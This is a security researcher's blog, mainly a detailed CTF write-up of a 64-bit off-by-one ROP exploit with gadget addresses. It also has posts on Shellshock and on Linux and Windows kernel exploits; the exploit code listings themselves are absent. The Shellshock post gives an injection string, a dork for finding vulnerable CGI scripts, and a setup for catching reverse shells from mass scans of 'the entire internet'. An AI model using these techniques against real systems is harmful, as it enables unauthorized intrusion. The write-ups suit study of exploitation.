31C3 CTF: Maze write-up

This is my write-up for the maze challenge in the 31C3 CTF, that I played with the Hacking For Soju team. We “only” got 10th place (out of the 286 teams that scored any points at all), but considering that only me, capsl and avlidienbrunn had time to spend any time on it (and I was able to score 170 out of our 340 points, which would have given me the #33 spot if I had played alone), it wasn’t too shabby! :) If I hadn’t been so sleepy/off during large parts of the CTF, I would probably have been able to score a bit more. Greets to capsl for brainstorming about the potential ROP-scenarios btw!

To make this write-up more useful for people that want to learn, I have tried to make it quite detailed.

The information for the challenge was:

The provided tar.gz file contained the binary for the challenge: maze

To run it as a server process on your own system, you can use the following command:

When connecting to the target, the following message is displayed:

Since the name of the challenge is “maze”, and we are presented with a message that states that we can only go east, the valid inputs are presumably east, west, north and south, and we are supposed to navigate through a maze in order to eventually reach some sort of goal. In order to understand exactly what is going on, and to see if there are any vulnerabilities that we can exploit along the way, our next step is to load the binary in IDA Pro and analyze the code. But first, let’s see what kind of protections are enabled for the binary in question, using checksec.sh.

I would suggest that you make a habit of checking which exploit mitigations have been enabled for your target before you start auditing it. For real-world targets, this will give you an idea of the preconditions you will probably have to meet in order to achieve reliable exploitation of the target (i.e. if information leaks are necessary, and so on). For CTF challenges, it can even provide hints on what kind of vulnerabilities to look for.

In this case, NX is enabled, so we will probably have to use a ROP based payload. PIE (Position-Independent Executable) is not enabled, so we will be able to use ROP gadgets from the executable itself even if ASLR is enabled on the target system. However, the binary is rather small, so there is probably only a limited number of suitable ROP gadgets available. Stack canaries are not enabled, which is a strong indication that the vulnerability to look out for in this case is probably a stack-based buffer overflow.

Do not rely completely on the information you determine this way though. In some cases (i.e, a poorly organized CTF), the binary running on the actual target is slightly different than the one provided, or some protections have been explicitly disabled/enabled on the target system.

Also note that the binary is a 64-bit Linux executable. Analyzing 64-bit (x86_64, to be specific) code has recently become a lot less time consuming, due to the release of Hex-Rays x64. Hex-Rays is an excellent decompiler plugin for IDA Pro, that lets you interactively work with the decompiled code in order to make sense of it. Note that there are still corner-cases that Hex-Rays is not able to handle, especially when dealing with obfuscated code and code that has been explicitly designed in order to make static analysis difficult. If you find something strange in the decompiled code, always perform manual analysis of the assembly code in question.

After the initial pass through the Hex-Rays decompiler, the code shown below is produced (note that irrelevant code, i.e the automatically inserted stub that is calling __libc_start_main() and the code handling initialization and cleanup, has been manually removed from the source code listing). While reading it, try to see if you can spot the vulnerability:

As you can see, this is a really small and simple program, and the Hex-Rays output is pretty readable as-is. When working with the code in IDA, I can clean things up further though. Renaming functions and variables, changing types and function definitions, adding comments, and manually fixing mistakes that has been made by IDA:s automatic code analysis, can make the code a lot easier to understand, and make it easier to spot vulnerabilities in the code.

After working with the code manually in IDA for a while, we end up with the following code. If you have not found the vulnerability yet, look for it once again while reading through the updated code listing:

If you did not find the vulnerability this time either, you need to practice more. ;) In the original code, it was easy to overlook (although still quite visible, when taking the stack/frame pointer offsets in the automatically produced comments into account). In the revised code, the vulnerability is rather obvious though. Note how the decompiled code in the append_highscore() function (originally, sub_400CE0) has changed:



As you can see, 1056 bytes is read into a 1056 byte buffer, but, it begins reading at offset 1. This means that we are able to overflow the buffer with one byte. While this is obviously a rather contrived example, off-by-one vulnerabilities are often found in the wild as well. Typical cases include people doing things like buf[sizeof(buf)] = X, or allocating room for strings without taking the terminating NUL-byte into account.

So, what can we accomplish with a 1-byte-overflow? Well, that obviously depends on what is stored right after the buffer in question, and if our target is running on a little-endian or a big-endian architecture. For little-endian architectures, including x86 and x86_64, the least significant byte (LSB) of a value, including pointers, is stored first. So, if we are overwriting the LSB of an address that is originally 0xbadc0ded, it is the ‘ed’ at the end of the address that will be overwritten, and not the ‘ba’ in the beginning of it. To make this clearer, here is an illustration of how the 32-bit value 0xbadc0ded is stored in memory (each hex-character represents 4 bits, so one byte is represented by two hex characters):


Overwriting the LSB of an address will thus shift it slightly, with up to 255 bytes depending on what the original value was. If the original value is 0x123456, overwriting the LSB with 00 will change it to 0x123400, effectively subtracting 0x56 from the original value. So, what is stored right after our buffer in this case? Well, the automatically produced comment for our buf-variable will reveal that right away. “[bp-420h]” means that the buffer is located at rbp (the current base/frame pointer value) minus 0x420 (and 0x420 = 1056). Note that rbp points to the location of the saved rbp value, that will be restored when returning from the function. Our 1-byte-overflow will overwrite the least-significant-byte of the saved rbp value, which means that we will be able to control (part of) rbp after append_highscore() has returned back into reached_goal().

Regarding frame pointers, note that they are actually forming a linked list. The current frame pointer value (rbp) points to the saved frame pointer value in the current function’s stack frame, and the saved frame pointer value points to the saved frame pointer of the calling function’s stack frame, and so on. Below you can see how the stack frames for each function in maze are linked together, at the time when append_highscore() is executed. Since the stack grows down, towards lower addresses, the ‘buf’ buffer in append_highscore()’s stack frame is stored at a lower address than all the saved frame pointer values.

maze stack

This description is a bit simplified though, since each function, including append_highscore(), saves a few other registers as well. While this is not apparent when looking in Hex-Rays, when looking at the actual assembly code in IDA we can see that the stack space that is being reserved for the buffer on the stack is actually 0x408 = 1032 bytes, and since this probably includes some extra padding added by gcc, the original size of the buffer in the source code was probably less than this. Most likely it was declared to be 1016 bytes, and the buf[1016] = ‘\0’ was actually buf[sizeof(buf)] = ‘\0’ in the original source code, and since the contents of the rbx register is pushed to the stack right before the stack space for buf is reserved, this actually means that the LSB of the saved rbx register is being overwritten with a NUL-byte regardless of if we are exploiting the overflow with read() or not.

function prologue for append_highscore()

When returning from append_highscore(), back into reached_goal(), the saved contents of the rbx, r12 and r13 registers are restored from the stack, as well as the saved frame pointer (rbp). In this case, reached_goal() is not using any of those registers before returning into main(), but if it did, that could have potentially resulted in other exploitable scenarios as well. Even though it did not matter in this particular case, always aim to have a complete understanding of everything that is going on, since there will be times when paying attention to those small details are crucial to success.

If reached_goal() would have referenced any local stack variables after append_highscore() returned, and if the assembly code produced to reference those variables used the base/frame pointer, that could have resulted in potentially exploitable side-effects for us as well. In cases such as this, when the function that was calling the vulnerable function is returning to a function one step further up the call-chain, an even more convenient opportunity arises though. For code that is compiled to use frame pointers, the function epilogue usually ends with “leave; ret”, or equivalently, “mov rsp, rbp; pop rbp; ret”. As you can see, this sets rsp = rbp (i.e, if we controlled the contents of rbp, we now control the stack pointer), pops the new rbp value, and finally returns (i.e. pops the return address, using the stack pointer that is now under our control). Looking at the code, we can see that it uses a variation of this, that sets rsp = rbp-0x28, restores 5 registers (5*8=40=0x28) and then pops rbp and returns.

function epilogue for reached_goal()

So, by exploiting the 1-byte-overflow of a stack buffer in append_highscore(), we will actually be able to control the stack pointer when returning from the reached_goal() function. In other words, we have control over where the return address is about to be retrieved. Pointing rsp into a buffer that we control the contents of will thus allow us to control the return address. Ideally, we want to point rsp into a buffer containing a full ROP chain to exploit the program in question. If we would have known the address of the system() function, and if the RDI register (that is used for storing the first function argument, in the standard x86_64 ABI) had contained the address of a buffer that we control the contents of, the full ROP chain in question would have only consisted of a return into system(). :) Always keep in mind all the parameters that are under your control (i.e register values, buffer contents, and so on), and information you currently have (base addresses of libraries, the executable, stack/heap addresses, and so on), and what information you can potentially deduce. Sometimes there are case-specific shortcuts you can take in order to achieve reliable exploitation of a particular target.

As I mentioned earlier, overwriting the least-significant-byte of the saved rbp value will allow us to shift it to an address slightly further up or down the stack, with up to a maximum of 255 bytes (up to 248 bytes in this case, since the saved rbp value will obviously be aligned to an 8-byte-boundary). Shifting it to a higher address will not do us any good, since we do not control the contents of any stack buffers allocated there. Shifting it to a lower address can potentially point it into the ‘buf’ buffer though, depending on what the LSB of the original saved rbp value is. By overflowing with a NUL-byte, we ensure that we are effectively subtracting as much as possible from the saved rbp value, and maximize our chances of pointing rbp into our buffer.

Due to ASLR, the LSB of the saved rbp value will vary (and sometimes, the LSB will even be 0 to begin with), so it is possible that we need to make a few attempts in order to exploit this. When ASLR is enabled, the base address (and once again, keep in mind that the stack grows down towards lower addresses) of the stack will be randomized, and unlike the randomization of base addresses for dynamically loaded libraries, and PIE-binaries, the offset within the memory page will be randomized as well. For libraries/PIE-binaries, the 12 least significant bits will always remain the same, and can be used to narrow down the potential binary versions that are running on a system that you are exploiting in cases where you have found an information leak.

We now know where the vulnerability is, and have a rough idea of how to exploit it (i.e, overflow the LSB of the saved rbp with a NUL-byte, hoping that it is enough to point it into our buffer, where we will store a ROP chain). This was the easy part. ;) To actually trigger the vulnerability, it turns out that we have to solve the maze. Since the maze is fairly large (179×95), we obviously don’t want to go through the process of solving the maze manually on each exploitation attempt (as I mentioned, the exploit will not work every time due to ASLR). Since the maze is static and hardcoded into the binary, we can just solve it manually and send the solution after connecting though.

Initially, I decided to make a small python script in order to visualize the maze. By analyzing the, slightly hairy, algorithm of the check_valid_moves_loop, we can deduce that maze_map[] is actually an array containing the x- and y-coordinates of all the occupied squares (the walls) in the maze. Even if we would not have been able to deduce this by looking at the code alone, it could have been deduced by analyzing the data in the array in question. Especially when visualizing it. :)

I made this script to extract the maze data from the binary, and create a PNG file:

This is the resulting PNG file:

I then wrote a simple recursive algorithm in order to solve the maze:

By connecting and sending the full solution to the maze we reach the vulnerable part of the code, i.e. the code that reads a name to add to the highscore list, in a fraction of a second. So, even if we need to make a few attempts in order to exploit it, due to ASLR, it will not make any real difference for us. Time to pwn. ;)

Since the binary is so small, we don’t have a lot of suitable ROP gadgets to play with. We need to find ways to use the ones we have as effectively as possible. My first attempt was to see if I could return into reached_goal(), right before the call to fopen(). We don’t actually need to get code execution on the target to solve this challenge, to get the flag we only need to be able to read a file (and based on the other levels, it seemed like a reasonable guess that the flag was stored in either /home/user/flag or /home/user/flag.txt). The code in reached_goal() reads the current highscore file, and prints the last of the names in question.

There is a problem with this approach though. We need to populate RDI with a pointer to a string with the filename we want to read, and at this point, we do not know the address of any buffer under our control. This problem is possible to solve by returning into read() though, in order to populate a buffer at an address of our choosing. A suitable address for this purpose must obviously be a valid and writable one, and since the target is a non-PIE-binary, the data segment for the executable itself resides at a fixed and known address. We can simply use 0x6060A0, which is the address of the .data section.

Note that read() is a libc-function, and since we do not know the address where libc is mapped, we can not return directly into read(). If we had known the libc base address, we could have just returned directly into system() at this point, after populating RDI with the address of the “/bin/sh” string within libc itself. We solve this by returning into the PLT-entry for read(), since read() is one of the functions that are imported by the non-PIE target binary. The PLT-entry for read(), which acts as a trampoline into read() in libc, is stored at 0x400850.

Since read() takes three arguments, that are passed in RDI, RSI and RDX respectively, we need to make a ROP chain that populates those registers before returning into read(). Ideally, our target binary would have contained instruction sequences such as “pop rdi; ret”, “pop rsi; ret” and “pop rdx; ret”, or even “pop rdi; pop rsi; pop rdx; ret”, but those instruction sequences are not commonly found in practice. Since x86 and x86_64 use variable-length instructions, that do not have to be aligned to any n-byte-boundary, it is possible to return into the middle of existing instructions though. By looking at partial instructions as well, we can find “pop rdi; ret” at 0x400f63 (the “pop rdi” instruction, opcode 0x5F, is actually the second byte of “pop r15” instruction) and “pop rsi; pop r15; ret” at 0x400f61 (the “pop rsi”, opcode 0x5E, is the second byte of a “pop r14” instruction), as you can see below:


It doesn’t matter that there is a “pop r15” instruction between the “pop rsi” and the “ret” instruction, as long as we are able to populate the registers we care about, without any side effects that cause the program to crash (invalid memory accesses, etc), it suits our purposes just fine.

Looking for ROP gadgets manually can be time-consuming though, especially for small binaries where there are few naturally occuring instruction sequences that are useful. Alternatives include using PEDA, Python Exploit Development Assistance for GDB, as can be seen below:

As you can see above, there are unfortunately no suitable “pop rdx” gadgets. There may be other ways for us to populate RDX though, and for our purposes, we don’t need to populate RDX with any specific value. Any non-zero value that is not too small is fine. The code we want to execute is read(0, ptr, N), where ptr is a pointer to a buffer that we are reading data into and N just needs to be at least as large as the data we want to read. As long as RDX still contains a non-zero value after the read(), even 1 might have been ok, if we can chain multiple calls to read().

For a more complete listing of ROP gadgets, that we can inspect manually in order to see if we can find anything useful, the ROPgadget tool by Jonathan Salwan can be used:

There does not seem to be any obvious gadgets available for setting RDX, and unfortunately, RDX is set to 0 (as a side effect of the call to fclose() before returning from append_highscore(), at least when running it on my own system while testing) when the function epilogue for reached_goal() is executed. Since RDX can be set as a side-effect when calling functions, we can try looking for “harmless” functions to return into in order to set RDX to a non-zero value though.

We also still have the problem of not knowing the base address of libc, and maybe there’s a way to solve both of these problems at once. :) By returning into the PLT-entry for puts(), that prints a string (or rather, prints any data up until the first NUL-byte it encounters), with RDI set to an address that contains a pointer into libc (such as a GOT-entry), we are able to both set RDX as a side-effect of the call to puts(), as well as leak a libc address that can be used to calculate the address of arbitrary libc functions. The fact that puts() also happens to set RDX as a side-effect was just a lucky coincidence, but if it hadn’t, there were a number of other functions we could try to call for that purpose.

Our original plan of simply returning into reached_goal(), right before the call to fopen(), is now obsolete. Since we have now leaked a libc address, we can simply use the read() in order to read a second stage ROP chain into a known location and then pivot the stack into that. The exploit will read the leaked address (a pointer to puts() in libc, by reading the GOT-entry for puts() in the address space of the non-PIE binary), calculate the base address of libc from that, and then the address of system(). Since we have just read arbitrary data into a known location, we can also place an arbitrary command string to be executed there, rather than using the “/bin/sh” string from libc. This also makes it more suitable for cases where we don’t know which libc version is used on the target system, since we only have to bruteforce one offset (between puts() and system()) rather than also having to know the address of the “/bin/sh” string. Another possibility, in that case, would be to use puts()-calls to leak data at page-boundaries below the leaked puts()-address, in order to find the base address of libc, and then implement symbol resolving by parsing the ELF header. That was actually what I ended up doing on the cfy-challenge, after my attempts that assumed an Ubuntu 14.04 libc failed (it turned out to be Ubuntu 14.10). :P

The only remaining piece of the puzzle at this point are gadgets to perform the stack pivot, into our second stage ROP chain. For this, we can use a “pop rbp; ret” gadget, that can be found at address 0x400AB0, in order to populate RBP. Then we use the “leave; ret”-equivalent in the function epilogue of reached_goal(), that I have already mentioned earlier, in order to point RSP into our second stage ROP chain. For the first stage ROP chain we also need a simple ret-gadget (such as the one at 0x400F64), since we do not know the exact offset into our buffer where the stack will be shifted (it will vary with each execution). By just filling the start of the buffer with addresses of ret-instructions, it will keep on returning until it reaches our ROP chain that we have placed right at the end of the buffer.

To sum it up. The gadgets we need are:

  • 0x400F64: Prepended to ROP chain for “NOP sled” effect (ret)
  • 0x400F63: Set RDI, i.e. the 1st function argument (pop rdi; ret)
  • 0x400F61: Set RSI, i.e. the 2nd function argument (pop rsi; pop r15; ret)
  • 0x400AB0: Set RBP, to prepare for the stack pivot (pop rbp; ret)
  • 0x400E96: Stack pivot (lea rsp, [rbp-0x28]; pop {rbx,r12-r15,rbp}; ret)

Note that the three fi

Besides these ROP gadgets, we also need:

  • 0x606028: GOT-entry for puts(), used to leak a libc address
  • 0x400850: PLT-entry for read(), returned into to read our 2nd stage ROP chain
  • 0x4007F0: PLT-entry for puts(), returned into to print the leaked address
  • 0x606XXX: Scratch buffer, that our 2nd stage ROP chain is read into

Initially, I used 0x6060A0 as the scratch buffer address, i.e. the start of the .data section. That resulted into running out of stack space in system() though, since the memory below this address will be used as stack space for functions that we are returning into from our 2nd stage ROP chain. I changed it to 0x606500, to give the stack more room to grow, and now we finally have a full working exploit. :)

As a final touch, I implemented support for providing a full interactive pty-session rather than a lousy interactive shell with no job control. ;) What good is pwning, if you can’t run vim on your targets?! :)

Sample session:

Note that you may have to run it multiple times to succeed, due to ASLR. If arrow-up+enter is too cumbersome, just run while true; ./maze-xpl.py; done :)

Source code for exploit provided below:

Ghost in The Shellcode 2015 Teaser: Citadel solution

This is my exploit for the Citadel challenge in the Ghost in The Shellcode 2015 Teaser CTF. I have attached my IDB as well, so those of you with IDA Pro can see what the reversing-part of the process looked like.

The Citadel challenge consisted of a custom SIP server (Linux/x86_64), with NX, ASLR and partial RELRO enabled. After some time reverse-engineering the binary, I discovered a format string vulnerability in a call to asprintf(). However, to actually get data under our control on the stack, in order to use the format string vulnerability effectively, I had to do some further digging…

My final exploit code:

Below you can see the output of the exploit. :)

The vulnerable binary:

My IDB for the binary:

Ghost in The Shellcode 2015 Teaser: Don’t Panic! Shift Keying! Solution

This was the only challenge remaining for us (ClevCode Rising) in the GITS 2015 Teaser CTF (http://ghostintheshellcode.com/2015-teaser/final_scores.txt), after I had solved the Citadel challenge and my team mate Zelik had solved Lost in Time. With no previous GNU Radio experience, I tried my luck, and was able to come very close to solving this in time to win the entire CTF. Unfortunately I had reversed the output-bits from the deinterleave-block… Next time, I won’t do the same mistake. ;)

Since it was a pretty fun challenge, I took the time to fix up my GNU Radio Companion diagram after the challenge ended and I had been made aware of my mistake, and made a cleaned up and minimized Python solution script as well.

This was the information given in the challenge:

Along with this picture:

And this data file:

My final solution was this piece of Python code:

Or, this GNU Radio Companion file:

Which yields this image, containing the flag! :)

Unique Opportunity – Mentorship for a Select Few (and maybe a new team?)

This post is directed to the people that share my interest in learning and understanding IT-security on a deeper level than most (vulnerability research, exploit development, reverse-engineering). The ones that are not interested in merely learning the tools of the trade, in order to do what any trained monkey would be able to do. Pointing and clicking, using scanners and tools made by other people, to detect and exploit vulnerabilities discovered by other people, without even necessarily having a basic understanding of the actual bugs that are being exploited. Those kinds of things have never had any appeal to me. I want to discover, I want to understand, and I never ever want to stop learning.

While the single best way to learn anything is by doing, having a knowledgeable mentor can speed up the process tremendously. He or she can guide you in the process, provide you with information and challenges chosen to take you from where you are now to where you want to be, and give you a helping hand if or when you get stuck. During my own journey, I have never had the luxury of having a mentor myself. I have, however, had the opportunity to teach and pass on some of my knowledge to willing students a few times. In those cases each student (or rather, the – usually government/defense related – clients that sent them to me) had to pay several thousands of dollars for my services. This time, I have something different in mind…

Perhaps you are currently a “web hacker”, knowing your way around things like XSS, XSRF, LFI/RFI, SQLi and command injection attacks, but want to delve into the realms of binary exploitation and reverse-engineering. Perhaps you are currently more into hardware hacking, and want to learn more about the software side of things, or perhaps you are well versed within the field of cryptography but want to have a better understanding of the software flaws that can often be used to circumvent it completely. Perhaps you are a beginner to the IT-security field, but with an ability to quickly learn and understand whatever you set your mind to.

I am searching for people with potential. Your current level of knowledge is not the most important part, rather, I want you to have the right kind of mindset to go a long way. I don’t care about whether you are a college dropout or a PhD, or if you are in fact still in school. Degrees, certifications and titles tell me absolutely nothing worth knowing. I do care about whether you have that same insatiable desire to learn and understand the world in general, and computers, networks and IT-security in particular, that has taken me to where I am today. You should have a genuine desire to learn, and a willingness to spend the time and energy it will require.

I will provide you with resources, I will give you challenges and hints about how to proceed to overcome them, adapted to your current level of knowledge. I will review your work, and give you information and suggestions on what you can do to improve even further. If or when you reach a certain level, I may even be able to provide you with some work for paying clients (if that’s of interest). If you really have potential, and live up to it, there will always be opportunities.

By now you might be wondering what the catch is, and you would be right to do so. I do not want your money, but I do want some of your time, and some of the talent you can provide. I am currently in the position of having a lot of ideas about things I would like to do, but far too little time to spend on them myself. A lot of these ideas revolve around the web, creating certain sites and services, or small applications (including mobile ones). Some of them are security related, and some of them are completely unrelated to security. Although none of them would be impossible for me to do on my own, I have slowly but surely come to the realization that it would take me a lot more time and effort to do these things than for someone that is already experienced within these fields, and time is something that I have far too little of already. In general, I have always avoided anything that has to do with developing user interfaces, so that is an area I am admittedly weak at. I do have strong opinions on how I would like them to look and work though. Although functionality always trumps beauty, aesthetics are important to me. In code, as well as in the visual side of things.

So, if you are experienced with rapid development and/or prototyping of web sites, including the backend, and/or mobile development, your chances of being chosen is definitely increased. The technologies I would prefer for these purposes are Node.js (perhaps in combination with the full “MEAN”-stack, Node, Angular, Express, MongoDB) in the backend, and probably Bootstrap in the frontend. Experience with building REST APIs, real-time web applications and customized widgets and components is a plus. I have spent some time researching various alternatives for developing the types of sites and services I would like to create, and those technology choices are what I am currently leaning towards, but feel free to come with other suggestions if you feel you have something else to bring to the table. A smaller subset of my ideas also require hardware hacking experience, and/or low level driver development, so those kinds of skills may be interesting to me as well.

As part of your training, my plan is also to let you participate in CTF competitions. I am currently competing with HackingForSoju, although we (and me in particular) have not been as active this year as we would have liked to. Last year, when we tried to be a bit more active, our team ranked between #4 and #7 in the world at ctftime.org (out of 3529 teams in total, to give you some perspective). This year we are currently at a modest 28th place (out of 4382 teams), but that’s a direct result of being so inactive (even when we have participated in a CTF, usually only a few of us have been able to play, and often only for a small part of the CTF). Personally, I have not been able to participate since Codegate (where we got 2nd place in the quals, and 6th place in the finals). My plan is to try to be a bit more active again in the future, and participate in some competitions with HackingForSoju and some with the people I’m mentoring. If I find 10 people (which is probably very optimistic, but one can always dream) with real potential, my goal would be to get you in the top 10 within a year.

If you are interested, send me a comment through the Contact-page, or send me an e-mail at je [at] clevcode [dot] org.

Anyway, if you are not already acquainted with me and my work within the IT-security field, it’s quite natural for you to want to know a bit more before considering this opportunity. As for my professional background, you can take a look at my CV. In short, I have participated in a number of challenges and competitions over the years, I have lead teams of talented IT-security researchers, I have been a speaker at conferences such as BlackHat, DefCon and the RSA conference and I have found vulnerabilities and created exploits for a number of targets (including smartphone and kernel vulnerabilities). Due to the sensitive nature of a lot of my clients, a lot of the research I have done remains confidential (including the most interesting), but there should be enough of public information available to give you a pretty good idea of the kind of skills I provide. :) If you have not already done so, browsing the rest of this site is a good idea as well.

CVE-2014-6271 / Shellshock & How to handle all the shells! ;)

For the TL;DR generation: If you just want to know how to handle all the shells, search for “handling all the shells” and skip down to that. ;)

CVE-2014-6271, also known as “Shellshock”, is quite a neat little vulnerability in Bash. It relies on a feature in Bash that allows child processes to inherit shell functions that were defined in the parent. I have played around with this feauture before, many years ago, since it could be abused in another way in cases where SUID-programs execute external shell scripts (or use system()/popen(), when /bin/bash is the default system shell) and with certain daemons that support environment variable passing. When a SUID-program is the target, the SUID-program must first do something like setuid(geteuid()) for this to be exploitable, since inherited shell functions are not accepted when the UID differs from the EUID. When SUID-programs call out to shellscript helpers (that need to be executed with elevated privileges) this is usually done, since most shells automatically drop privileges when starting up.

In those cases, it was possible to trick Bash into executing a malicious shell function even when PATH is set explicitly to a “safe” value, or even when the full path is used for all calls to external programs. This was possible due to Bash happily accepting slashes within shell function names. :) This example demonstrates this problem, as well as the new (and much more serious) CVE-2014-6271 vulnerability.

As you can see, the environment variable named “/usr/bin/id” is set to “() { cmd1; }; cmd2”. Due to the CVE-2014-6271 vulnerability, any command that is provided as “cmd2” will be immediately executed when Bash starts. Due to the peculiarity I was already familiar with, the “cmd1” part is executed when trying to run id in a “secure” manner by providing the full path. :)

One of the possibilities that crossed my mind when I got to know about this vulnerability was to exploit this over the web, due to CGI programs using environment variables to pass various information that can be arbitrarily controlled by an attacker. For instance, the user-agent string, is normally passed in the HTTP_USER_AGENT environment variable. It turns out I was not alone in thinking about this though, and shortly after information about the “Shellshock” vulnerability was released, Robert Graham at Errata Security started scanning the entire internet for vulnerable web servers. Turns out there are quite a few of them. :) The scan is quite limited in the sense that it only discovers cases where the default page (GET /) of the default virtual host is vulnerable, and it only uses the Host-, Referer- and Cookie-headers. Another convenient header to use is the User-Agent one, that is normally passed in the HTTP_USER_AGENT variable. Another way to find lots and lots of potentially vulnerable targets is to do a simple google search for “inurl:cgi-bin filetype:sh” (without the quotes). As you may have realized by now, the impact of this vulnerability is enormous.

So, now to the part of handling all the shells. ;) Let’s say you are testing a large subnet (or the entire internet) for this vulnerability, and don’t want to settle with a ping -c N ADDR-payload, as the one Robert Graham used in his PoC. A simple netcat listener is obviously no good, since that will only be useful to deal with a single reverse shell. My solution gives you as many shells as the amount of windows tmux can handle (a lot). :)

Let’s assume you want a full reverse-shell payload, and let’s also assume that you want a full shell with job-control and a pty instead of the less convenient one you usually get under these circumstances. Assuming a Python interpreter is installed on the target, which is usually a pretty safe bet nowadays, I would suggest you to use a payload such as this (with ADDR and PORT replaced with your IP and port number, of course):

To try this out, just run this in one shell to start a listener:

Then do this in another shell:

To deal with all the shells coming your way I would suggest you to use some tmux+socat-magic I came up with when dealing with similar “problems” in the past. ;)

Place the code below in a file named “alltheshells-handler” and make it executable (chmod 700):

Execute this command to start the listener handling all your shells (replace PORT with the port number you want to listen to):

When the shells start popping you can do:

The tmux session will not be created until at least one reverse shell has arrived, so if you’re impatient just connect to the listener manually to get it going.

If you want to try this with my personal spiced-up tmux configuration, download this:

Switch between windows (shells) by simply using ALT-n / ALT-p for the next/previous one. Note that I use ALT-e as my meta-key instead of CTRL-B, since I use CTRL-B for other purposes. Feel free to change this to whatever you are comfortable with. :)

CVE-2014-3153 Exploit


This awesome vulnerability, that affect pretty much all Linux kernels from the last five years, was found by Comex about a month ago. It is also the vulnerability that is used in TowelRoot by GeoHot, to root the Samsung S5 and a bunch of other Android based devices. TowelRoot is closed source and heavily obfuscated though, and there are still no public exploits available for this vulnerability for desktop/server systems. So, I decided to make one myself. ;)

One of the interesting things with this vulnerability is that it is triggered through the futex() syscall, that is usually allowed even within very limited sandboxes (such as the seccomp-based one used by Google Chrome). The reason that this syscall is usually allowed is because it’s used to implement threading primitives, so unless the sandboxed application is single-threaded the futex() syscall is required.

This is not the first, and certainly not the last, time that I developed a kernel exploit. Some of you may remember the exploit I developed for a Windows GDI vulnerability back in 2006, for a vulnerability that Microsoft did not patch until two weeks after I demonstrated my exploit at BlackHat Europe in 2007. I must say though, this was definitely more challenging than most kernel vulnerabilities I have researched. Fortunately, challenging equals fun for me. ;)

My initial exploit patched the release() function pointer in the ptmx_fops structure, to achieve code execution in kernel context and calling commit_creds(prepare_kernel_cred(0)). The problem with this approach, however, was that it is prevented by a protection mechanism known as SMEP, that is supported by Intel Haswell CPU:s. Due to this, I changed my exploit to target the addr_limit value in the thread_info structure instead. This allows me to enable one of my threads to read/write arbitrary kernel memory, and provide root-access for me (and optionally disable other kernel-based protection mechanisms, such as SELinux) without having to executing any code in kernel context.

To Comex, great job in finding this vulnerability! I first realized what a talent you have after reverse-engineering your star-exploit back in 2010 (before realizing that you had released it as open source :D), that you used for the JailbreakMe 2.0 site. Judging from all the vulnerabilities you have found since then, you are no one-hit-wonder either. ;) Unlike a lot of the kids these days, you find a lot of vulnerabilities that requires a deep understanding of the target code in question, rather than just throwing a fuzzer at it.

To GeoHot, really impressive work with developing the TowelRoot exploit in such a short amount of time! The breadth and depth of your work, ranging from PS3 jailbreaks, iPhone unlocks and jailbreaks, and now Android roots, not to mention your success in CTF competitions with PPP as well as with your one-man-team, is truly an inspiration. :)

Available for projects

I am currently available for projects involving:

  • Code Auditing
  • Reverse-Engineering
  • Exploit Development
  • Vulnerability Assessments
  • Malware Analysis
  • Security Research-oriented projects in general

For more information about me and my abilities, besides what you can see in my posts here, you are welcome to take a look at my CV:


For select clients, I might also be available for teaching on the subject of vulnerability analysis, reverse-engineering and exploit development. I have developed and held a fast paced six-day course on these subjects before.

Since my clients tend to stick with me for a long time, this is a rare window of opportunity for those that want to establish a working relationship with me. ;) I am primarily looking for projects that I am able to do remotely.

Oldies but goldies #2: Windows GDI Kernel Exploit

Found another one of my old exploits. This one a Windows kernel exploit from 2006. :)

This also happens to be one of the exploits I demonstrated (but did not release) at BlackHat and DefCon in 2007, in our Kernel Wars talk. It was actually still unpatched when demonstrating it at BlackHat Europe, even though Microsoft had known about it (but did not think it was exploitable) since 2004. More information about that, and a couple of screenshots, can be found at kernelwars.blogspot.com.

In the demonstration I combined it with an exploit for another 0day we had in Office XP / Microsoft Word, to show the real impact of a privilege escalation exploit such as this one. Nowadays, kernel exploits are probably the most convenient way to break out of browser sandboxes such as the one used in Google Chrome, and of course to enable execution of unsigned code in iOS-based devices such as the iPhone and the iPad. Another nice thing about kernel vulnerabilities is that there are usually far fewer exploit mitigation mechanisms in the kernel than in userspace. ;)


Oldies but goldies: Exploits for CVS and Courier IMAP

Looking through some old disks now, and found a couple of exploits I coded back in 2004. Good old times. :)

The first one is an exploit for a double free() in CVS <= 1.11.16. It is heavily documented, since I used it as one of the examples in a 6-day course in exploit development and reverse engineering I taught back then. Even though the current malloc() implementations have much more integrity checks now than they did back then, I think the detailed analysis of the exploitation method in the exploit comments can be quite useful to read and understand for people learning exploit development now. There's often a bit too much trial & error involved when novices (and even some experienced exploit developers) code exploits, doing a detailed analysis and understanding every aspect of the vulnerability and the subsystems involved (in this case dlmalloc) is the best approach for making the exploit as reliable as possible. The other one is a format string vulnerability in Courier IMAP <= 3.0.3. This one required DEBUG_LOGIN to be set though, so wasn't that useful in the real world. Since I've always avoided making "target based" exploits with hardcoded addresses and offsets, if not absolutely necessary, the Courier IMAP exploit automatically determines whether the target is Linux or FreeBSD, the offset to the buffer on the stack, the address of the buffer (by first determining the offset to the stack base, with a known address back then when there was no ASLR), and the offset to the saved return address in auth_debug():s stack frame. The shellcode is customized to do a dup2(1, 2) before executing a shell, since fd 1 pointed to the socket descriptor and fd 2 was used for logging errors. Wouldn't want to have the stderr of the shell redirected to a server log. ;) cvs-argx.c: